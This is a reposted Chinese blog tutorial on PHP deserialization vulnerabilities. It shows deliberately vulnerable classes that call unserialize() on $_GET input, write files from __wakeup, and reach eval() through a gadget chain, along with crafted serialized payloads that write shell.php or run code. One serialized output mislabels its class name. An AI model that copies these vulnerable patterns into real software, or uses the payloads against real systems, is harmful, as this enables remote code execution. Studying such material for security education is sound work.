5. 通过PHP反序列化进行远程代码执行

最新推荐文章于 2023-05-28 10:54:55 发布
最新推荐文章于 2023-05-28 10:54:55 发布
阅读量197 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/bmjoker/p/8889240.html
版权

php序列化与反序列化

最近准备复现一下ecshop2.x,3.x的注入漏洞,其中涉及到了php反序列化的问题,由于之前太小白

,导致粗心大意,所以此对php反序列化漏洞进行更详细的分析。

 

提起php序列化与反序列化不得不说两个函数是:serialize()unserialize()

serialize()

当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。测试代码如下:

<?php
class bmjoker{
    var $test = '123';
}
$class1 = new bmjoker;
$class1_ser = serialize($class1);
print_r($class1_ser);
?>

这边我们创建了一个新的对象,并且将其序列化后的结果打印出来:

O:7:"bmjoker":1:{s:4:"test";s:3:"123";}

unserialize()

与 serialize() 对应的,unserialize()可以从已存储的表示中创建PHP的值,单就本次所关心的环境而言,可以从序列化后的结果中恢复对象(object)。

<?php
class bmjoker{
    var $test = '123';
}
$class2 = 'O:7:"bmjoker":1:{s:4:"test";s:3:"123";}';    
print_r($class2);
echo "</br>";
$class2_unser = unserialize($class2);
print_r($class2_ser);
?>

这边我们把序列化后的结果恢复成为对象,并且将其打印出来:

O:7:"bmjoker":1:{s:4:"test";s:3:"123";}
bmjoker Object ( [test] => 123 )

这里提醒一下,当使用 unserialize() 恢复对象时, 将调用 __wakeup() 成员函数。

反序列化漏洞

由前面可以看出,当传给 unserialize() 的参数可控时,我们可以通过传入一个精心构造的序列化字符串,从而控制对象内部的变量甚至是函数。

利用构造函数等

Magic function

php中有一类特殊的方法叫“Magic function”, 这里我们着重关注一下几个:

  • 构造函数__construct():当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。
  • 析构函数__destruct():当对象被销毁时会自动调用。
  • __wakeup() :如前所提,unserialize()时会自动调用。

测试如下:

<?php
class bmjoker{
    var $test = '123';
    function __wakeup()
    {
        echo "__wakeup()函数被调用";
        echo "</br>";
    }
    function __construct()
    {
        echo "__construct()函数被调用";
        echo "</br>";
    }
    function __destruct()
    {
        echo "__destruct()函数被调用";
        echo "</br>";
    }
}
$class2 = 'O:7:"bmjoker":1:{s:4:"test";s:3:"123";}';
print_r($class2);
echo "</br>";
$class2_unser = unserialize($class2);
print_r($class2_unser);
echo "</br>";
?>

我们运行php文件,来证明函数被调用:

应为没有创建对象,所以构造函数__construct()不会被调用,但是__wakeup()跟__destruct()函数都被调用,如果这些函数里面包含的是恶意代码会怎么样呢?

利用场景

__wakeup() 或__destruct()

由前可以看到,unserialize()后会导致__wakeup() 或__destruct()的直接调用,中间无需其他过程。因此最理想的情况就是一些漏洞/危害代码在__wakeup() 或__destruct()中,从而当我们控制序列化字符串时可以去直接触发它们。这里针对 __wakeup() 场景做个实验。

基本的思路是,本地搭建好环境,通过 serialize() 得到我们要的序列化字符串,之后再传进去。通过源代码知,把对象中的test值赋为 “<?php phpinfo(); ?>”,再调用unserialize()时会通过__wakeup()把$test的写入到shell.php中。为此我们写个php脚本:

<?php
class bmjoker{
    var $test = '123';
    function __wakeup(){
        $fp = fopen("shell.php","w") ;
        fwrite($fp,$this->test);
        fclose($fp);
    }
}
$class4 = new bmjoker();
$class4->test = "<?php phpinfo(); ?>";    
$class4_ser = serialize($class4);    
print_r($class4_ser);
print("<br>");
$class5_unser = unserialize($class4_ser);
print_r($class5_unser);
?>

由此得到序列化结果:

O:7:"chybeta":1:{s:4:"test";s:19:"<?php phpinfo();?>";}

运行结果:

我们再来看shell.php:

成功的利用反序列化漏洞来得到phpinfo()信息

不过具体的环境多是像下面代码这样,我们的test是我们可控的参数

<?php
class bmjoker{
    var $test = '123';
    function __wakeup(){
        $fp = fopen("shell.php","w") ;
        fwrite($fp,$this->test);
        fclose($fp);
    }
}
$class3 = $_GET['test'];
print_r($class3);
echo "</br>";
$class3_unser = unserialize($class3);
require "shell.php";
// 为显示效果,把这个shell.php包含进来
?>

我们传入参数  test=O:7:"bmjoker":1:{s:4:"test";s:18:"<?php phpinfo();?>";}

同时shell.php也成功写入:

成功利用php反序列化漏洞

其他Magic function的利用

但如果一次unserialize()中并不会直接调用的魔术函数,比如前面提到的__construct(),是不是就没有利用价值呢?非也。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadget”找到漏洞点。

<?php
class joker{
    function __construct($test){
        $fp = fopen("shell.php","w") ;
        fwrite($fp,$test);
        fclose($fp);
    }
}
class bmjoker{
    var $test = '123';
    function __wakeup(){
        $obj = new joker($this->test);
    }
}
$class5 = $_GET['test'];
print_r($class5);
echo "</br>";
$class5_unser = unserialize($class5);
require "shell.php";
?>

这里我们给test传入构造好的序列化字符串后,进行反序列化时自动调用 __wakeup()函数,从而在new joker()会自动调用对象joker中的__construct()方法,从而把<?php phpinfo();?>写入到shell.php中:

同样shell.php也成功写入。

利用普通成员方法

前面谈到的利用都是基于“自动调用”的magic function。但当漏洞/危险代码存在类的普通方法中,就不能指望通过“自动调用”来达到目的了。这时的利用方法如下,寻找相同的函数名,把敏感函数和类联系在一起。

<?php
class lmjoker{
    var $test;
    function __construct() {
        $this->test = new bmjoker();
    }
    function __destruct() {
        $this->test->action();
    }
}
class bmjoker{
    function action() {
        echo "bmjoker";
    }
}
class cmjoker{
    var $test2;
    function action() {
        eval($this->test2);
    }
}
$class6 = new lmjoker();
unserialize($_GET['test']);
?>

本意上,new一个新的lmjoker对象后,调用__construct(),其中又new了bmjoker对象。在结束后会调用__destruct(),其中会调用action(),从而输出 bmjoker。

 

下面是利用过程。构造序列化:

<?php
class lmjoker{
    var $test;
    function __construct() {
        $this->test = new cmjoker();
    }
}
class cmjoker{
    var $test2 = "phpinfo();";
}
echo serialize(new lmjoker());
?>

得到:

O:7:"lmjoker":1:{s:4:"test";O:7:"cmjoker":1:{s:5:"test2";s:10:"phpinfo();";}}

传给test.php的test参数,利用成功:

 

参考链接:
https://blog.csdn.net/qq_32400847/article/details/53873275

https://chybeta.github.io/2017/06/17/%E6%B5%85%E8%B0%88php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/

 

转载于:https://www.cnblogs.com/bmjoker/p/8889240.html

weixin_30649641
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP序列化/对象注入漏洞分析
12-18
我们检测到了应用里使用了PHP序列化,所以我们可以开始确认应用代码里是否含有远程代码执行漏洞。需要注意的是,序列化对象是从参数“r”取来的: $var1=unserialize($_REQUEST[‘r’]); 然后再进行反序列化
泛微E-Office10远程代码执行漏洞
最新发布
05-06
攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行反序列化机制来触发远程代码执行。成功利用这一漏洞的攻击者可以执行服务器上的任意代码,从而获得服务器的控制权限。在最糟糕的情况下,这...
PHP 反序列化
qq_41672971的博客
11-24 264
123
PHP反序列化命令执行及防范
金色%夕阳的博客
05-08 1001
PHP反序列化命令执行 1、 序列化与反序列化原理 序列化(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。依照序列化格式重新获取字节的结果时,可以利用它来产生与原始对象相同语义的副本。序列化是一种将对象的状态信息转换为可以存储或传输的形式的过程(转化为信息流)。在序列化期间,对象将其当前状态写入到临时或持久性存储区以后,可以通过从存储区中读取或反序列化对象
PHP反序列化
aetlypdlg_ys的博客
05-28 367
序列化是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简而言之,序列化相当于加密,反序列化相当于解密。再看一个生动的例子:我们在网上买桌子,桌子这种很不规则的东西,这时候一般都会把它拆掉成板子,再运出去,这个过程就可看作序列化的过程(把数据转化为可以存储或者传输的形式)。当我们收到货后,需要自己把这些板子组装成桌子的样子,这个过程就像反序列的过程(转化成当初的数据对象)。php 将数据序列化和反序列化会用到两个函数serialize 将对象格式化成有序的字符串。
php+反序列化代码执行漏洞,PHP反序列化漏洞
weixin_30444517的博客
03-11 264
0x001 漏洞产生原理在反序列化的过程中自动触发了某些魔术方法。未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致XSS、代码执行、文件写入、文件读取等不可控后果。0x002 漏洞触发条件一般只能通过代码审计的方式挖掘该漏洞,寻找代码unserialize()函数的变量可控,且PHP文件代码中存在可利用的类,同时类中具有魔术方法。0x003 PHP魔术方法__cons...
exploit_laravel_cve-2018-15133:利用 API_KEY 利用 Laravel 远程代码执行 (CVE-2018-15133)
05-31
来自 CVE 的描述: 在 Laravel Framework 到 5.5.40 和 5.6.x 到 5.6.29 中,远程代码执行可能由于对潜在不可信 X-XSRF-TOKEN 值的反序列化调用而发生。 这涉及到 Illuminate/Encryption/Encrypter.php 中的解密...
8~15k,网络安全面试真题.pdf
02-05
16. 远程代码执行漏洞? 17. waf绕过? 18. 文件上传怎么绕过? 19. 怎么对文件内容过滤? 20. 怎么排查攻击来源? 21. 介绍下了解的中间件以及中间件漏洞? 22. 中间件日志分析、Windows、Linux日志分析? 23. 你...
基于python的代码审计工具+源代码+文档说明
12-01
./nu.php:5 : eval或者assertc函数中存在变量,可能存在代码执行漏洞 ./un.php:6 : eval或者assertc函数中存在变量,可能存在代码执行漏洞 ./un.php:17 : unserialize函数中存在变量,可能存在反序列化漏洞 ./2....
php 反序列化 && 常见的利用
3569
06-20 3022
http://www.lmxspace.com/2018/05/03/php-unserialize-%E5%88%9D%E8%AF%86/第一章 写在开头在OWASP TOP10中,反序列化已经榜上有名,但是究竟什么是反序列化,我觉得应该进下心来好好思考下。我觉得学习的时候,所有的问题都应该问3个问题:what、why、how。what:什么是反序列化,why:为什么会出现反序列化漏洞,how:...
利用phar实行php反序列化命令执行漏洞复现
aobipi2343的博客
09-03 403
利用phar实行php反序列化命令执行(测试环境复现) 前言 一般说到反序列化漏洞,第一反应都是unserialize()函数。然而安全研究员Sam Thomas分享了议题”It’s a PHP unserialization vulnerability Jim, but not as we know it”,利用phar伪协议会将用户自定义的meta-data序列化的形式存储这一特...
PHP反序列化漏洞与Webshell
vspiders的博客
03-21 5024
前言最近和小伙伴们一起研究了下PHP反序列化漏洞,突发奇想,利用反序列化漏洞写一个一句话木马效果应该蛮不错的。于是便有此文。0x01 PHP反序列化说起PHP反序列化,那必须先简单说一下PHP的序列化。PHP序列化是将一个对象、数组、字符串等转化为字节流便于传输,比如跨脚本等。而PHP反序列化是将序列化之后的字节流还原成对象、字符、数组等。但是PHP序列化是不会保存对象的方法。&lt;?php c...
ECSHOP 2.7.x sql注入漏洞分析
weixin_43263451的博客
04-16 3353
ecshop将我们可控的参数渲染进模板时,其中利用到$fun($para) 进行动态调用,而通过精心构造的payload使得$fun和$para我们可控,导致可以调用任何函数,从而达到sql注入 1. POC与复现 POC: Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:1:"1";s:2:"id";s:52:"1' and updatexml(0x7e,concat(0x7e,database()),0x7e)#";} 复现
利用phar实行php反序列化命令执行(测试环境复现)
weixin_30362233的博客
08-31 306
测试环境的过程大概是:构成出来的phar文件,并修改为任意后缀上传至服务器。通过index.php中存在的文件操作函数参数可控,把参数设置为 phar://上传文件名 即可导致命令执行。 index.php代码如下 <?php class foo { var $ha = 'echo "ok";'; function __destruct() { ...
PHP 反序列化漏洞
weixin_43801718的博客
10-23 1288
序列化与反序列化 在维基百科中是这样定义的: 序列化是(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换为可取用格式(例如存成文件,存于缓存,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。 概念其实很容易理解,就是将数据转换为一种可逆的存储格式,正向存储为序列化,反向存储就为反序列化。 按照王sir的理解,设想这样一种场景:在双十...
PHP代码中的序列化与反序列化(1)
zezai3010的博客
12-01 2494
序列化就是使用serialize()将对象的用字符串的方式进行表示,反序列化是使用unserialize()将序列化的字符串,构造成相应的对象,反序列化是序列化的逆过程。 0×00 序列化和反序列化 简单的理解:序列化就是使用serialize()将对象的用字符串的方式进行表示,反序列化是使用unserialize()将序列化的字符串,构造成相应的对象,反序列化是序列化的逆过程。 
(37)【PHP反序列化PHP反序列化原理、函数、利用过程
04-17 3506
【专题】PHP反序列化利用
php反序列化 soap
10-17
PHP反序列化攻击是一种常见的Web安全漏洞,攻击者可以通过构造恶意的序列化数据,使得服务器在反序列化执行攻击者预设的恶意代码。而SOAP协议是一种基于XML的远程调用协议,也可以被用于反序列化攻击。 具体来说...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值